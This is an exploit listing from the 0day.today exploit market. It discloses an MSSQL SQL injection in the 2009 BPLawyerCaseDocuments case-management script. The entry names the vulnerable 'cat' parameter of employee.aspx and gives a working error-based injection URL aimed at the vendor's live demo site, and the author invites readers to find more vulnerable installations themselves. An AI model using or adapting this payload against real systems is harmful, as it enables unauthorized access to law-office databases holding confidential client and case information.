[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BPLawyerCaseDocuments SQL Injection

Author
OoN Boy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9853
Category
web applications
Date add
22-09-2009
Platform
unsorted
===================================
BPLawyerCaseDocuments SQL Injection
====================================

[x]========================================================================================================================================[x]
 | Title            : BPLawyerCaseDocument 1.0 MSSQL Vulnerabilities                                    |
 | Software         : BPLawyerCaseDocument                                                  |
 | Vendor           : http://bpowerhouse.info                                               |
 | Demo         : http://www.bpowerhouse.info/BPLawyerCaseDocuments                                 |
 | Date         : 22 September 2009 ( Indonesia )                                           |
 | Author           : OoN_Boy                                                                                                     |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Technology       : ASP.NET 2.0                                                                                                       |
 | Database     : MSSQL 2005                                                                                                        |
 | Version      : 1.0                                                                                                           |
 | License      : GNU GPL                                                                                                           |
 | Price        : $29.00                                                                                                            |
 | Description      : Is a script where lawyers can manage cases and deal with case documents in an easy way. The script allows     |
 |            attorneys and law offices to manage and view case documents. It includes an agent panel where agents can login and|
 |            manage clients information and includes an administrator panel where site administrator can have control of all   |
 |            Data                                                          |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Google Dork      : cari sendiri yah :)                                                   |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Exploit      : http://localhost/[path]/employee.aspx?cat=[sql]                                   |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Proof of concept : http://www.bpowerhouse.info/BPLawyerCaseDocuments/employee.aspx?cat=1+and+1=convert(int,@@version)--          |
 |            you must login for test                                               |
[x]========================================================================================================================================[x]
 

#  0day.today [2024-09-29]  #